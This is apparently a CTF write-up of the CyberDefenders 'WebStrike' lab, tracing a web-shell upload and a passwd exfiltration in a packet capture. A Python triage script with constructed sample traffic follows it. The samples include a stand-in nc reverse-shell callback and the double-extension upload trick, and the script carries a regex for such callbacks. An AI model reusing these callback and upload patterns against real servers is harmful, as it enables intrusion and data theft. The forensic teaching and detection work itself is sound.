WebStrike | CyberDefenders Lab Walkthrough


Introduction:
Hey everyone! It's been a while since I posted a writeup on here. I was very busy with university, but now I'm going back to writing CTF write-ups!
Here’s the link to the lab: https://cyberdefenders.org/blueteam-ctf-challenges/webstrike/
Q1- Understanding the geographical origin of the attack aids in geo-blocking measures and threat intelligence analysis. What city did the attack originate from?
Start off by opening the PCAP file. We find that the source IP that sends the most requests is 117.11.88.124, which is a pretty good indicator of malicious behaviour.
Looking this address up on WhatIsMyIPAddress gives us the answer to the first question.
Answer: Tianjin
Q2-Knowing the attacker’s user-agent assists in creating robust filtering rules. What’s the attacker’s user agent?
We use the display filter http.request.method == "GET" to isolate the requests, then inspect the Packet Details pane to find the User-Agent header.
Answer: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Q3-We need to identify if there were potential vulnerabilities exploited. What’s the name of the malicious web shell uploaded?
To find a malicious web shell upload, filter for packets with source IP 117.11.88.124 that use HTTP with the POST method.
Uploads use POST because that is the method that carries the file body, so filtering on POST narrows the packet list and makes the upload easy to spot.
Answer: image.jpg.php
Q4-Knowing the directory where files uploaded are stored is important for reinforcing defences against unauthorized access. Which directory is used by the website to store the uploaded files?
Since we already have the name of the malicious script, searching for it lets us follow its execution.
It's also fairly obvious that the /uploads/ path is where the attacker would try to reach the script first, because that is the uploads section of the site.
Answer: /reviews/uploads/
Q5-Identifying the port utilized by the web shell helps improve firewall configurations for blocking unauthorized outbound traffic. What port was used by the malicious web shell?
To find this, go back to the POST request that contains the upload. The script body is visible, along with the IP and port of the attacker's nc listener.
Answer: 8080
Q6-Understanding the value of compromised data assists in prioritizing incident response actions. What file was the attacker trying to exfiltrate?
To see this, find the packet with source IP 24.49.63.79 and destination IP 117.11.88.124 that uses the POST method.
Answer: passwd
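The six questions above are really one triage procedure: find the top talker, pull its User-Agent, spot the multipart upload with a double-extension filename, note the directory it is later requested from, extract the callback port from the uploaded script, and catch the web server itself making an outbound POST. The following Python script is an added example (not part of the original walkthrough or the lab files) that runs that procedure over a small set of constructed HTTP requests; the request text, the host name shop.example and the callback address 203.0.113.10 are all made up for the demonstration, and only the two IPs and the filename named in the walkthrough are taken from it. In practice you would feed it request text exported from Wireshark (Follow TCP Stream) or tshark rather than the inline sample.

```python
import re
from collections import Counter

UA = "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"

# Constructed sample flows (NOT from the lab pcap): (src_ip, dst_ip, raw HTTP request).
# 24.49.63.79 plays the web server, 117.11.88.124 the attacker, 203.0.113.10 is a
# documentation-range address standing in for the callback host.
SAMPLE_FLOWS = [
    ("117.11.88.124", "24.49.63.79",
     "GET /reviews/ HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: " + UA + "\r\n\r\n"),
    ("117.11.88.124", "24.49.63.79",
     "GET /reviews/upload.php HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: " + UA + "\r\n\r\n"),
    ("117.11.88.124", "24.49.63.79",
     "POST /reviews/upload.php HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: " + UA + "\r\n"
     "Content-Type: multipart/form-data; boundary=XYZ\r\n\r\n"
     "--XYZ\r\nContent-Disposition: form-data; name=\"file\"; filename=\"image.jpg.php\"\r\n"
     "Content-Type: image/jpeg\r\n\r\n"
     "<?php /* constructed stand-in for the shell: calls back with nc 203.0.113.10 8080 */ ?>\r\n"
     "--XYZ--\r\n"),
    ("117.11.88.124", "24.49.63.79",
     "GET /reviews/uploads/image.jpg.php HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: " + UA + "\r\n\r\n"),
    ("24.49.63.79", "117.11.88.124",   # the server acting as a client: exfiltration
     "POST / HTTP/1.1\r\nHost: 117.11.88.124:8080\r\nContent-Type: text/plain\r\n\r\n"
     "root:x:0:0:root:/root:/bin/bash\r\n"),
    ("198.51.100.7", "24.49.63.79",    # an unrelated, benign visitor
     "GET /index.php HTTP/1.1\r\nHost: shop.example\r\nUser-Agent: curl/8.0\r\n\r\n"),
]

SUSPICIOUS_EXT = re.compile(r"\.(php\d?|phtml|phar|jsp|aspx?)$", re.I)   # executable server-side extensions
FILENAME_RE = re.compile(r'filename="([^"]+)"')                          # multipart Content-Disposition
CALLBACK_RE = re.compile(r"\bnc\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")  # "nc <ip> <port>" in a body


def parse_request(raw):
    """Split a raw HTTP request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def top_talker(flows):
    """Q1: the source IP with the most requests."""
    return Counter(src for src, _, _ in flows).most_common(1)[0][0]


def user_agents(flows, src_ip):
    """Q2: distinct User-Agent strings sent by one source."""
    return sorted({parse_request(raw)["headers"].get("user-agent", "")
                   for src, _, raw in flows if src == src_ip})


def find_uploads(flows, src_ip):
    """Q3 and Q5: POSTed files with a server-side extension, plus any nc callback in the body."""
    hits = []
    for src, _, raw in flows:
        req = parse_request(raw)
        if src != src_ip or req["method"] != "POST":
            continue
        for name in FILENAME_RE.findall(req["body"]):
            if SUSPICIOUS_EXT.search(name):
                cb = CALLBACK_RE.search(req["body"])
                hits.append({"filename": name, "upload_path": req["path"],
                             "callback": (cb.group(1), int(cb.group(2))) if cb else None})
    return hits


def upload_directory(flows, filename):
    """Q4: the directory the uploaded file is later requested from."""
    for _, _, raw in flows:
        req = parse_request(raw)
        if req["method"] == "GET" and req["path"].endswith("/" + filename):
            return req["path"][: -len(filename)]
    return None


def outbound_posts(flows, server_ip):
    """Q6: POSTs whose *source* is the web server; a server should not be acting as a client."""
    return [(dst, parse_request(raw)["body"].strip())
            for src, dst, raw in flows
            if src == server_ip and parse_request(raw)["method"] == "POST"]


if __name__ == "__main__":
    attacker = top_talker(SAMPLE_FLOWS)
    print("top talker:", attacker)
    print("user agents:", user_agents(SAMPLE_FLOWS, attacker))
    for hit in find_uploads(SAMPLE_FLOWS, attacker):
        print("upload:", hit, "served from", upload_directory(SAMPLE_FLOWS, hit["filename"]))
    print("outbound POSTs from server:", outbound_posts(SAMPLE_FLOWS, "24.49.63.79"))
```

The checks are deliberately independent so that each one still fires when another fails: a shell uploaded under a harmless-looking name would be missed by the extension check but still caught by the callback pattern or by the server-originated POST, which is the signal worth alerting on regardless of how the shell got there.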
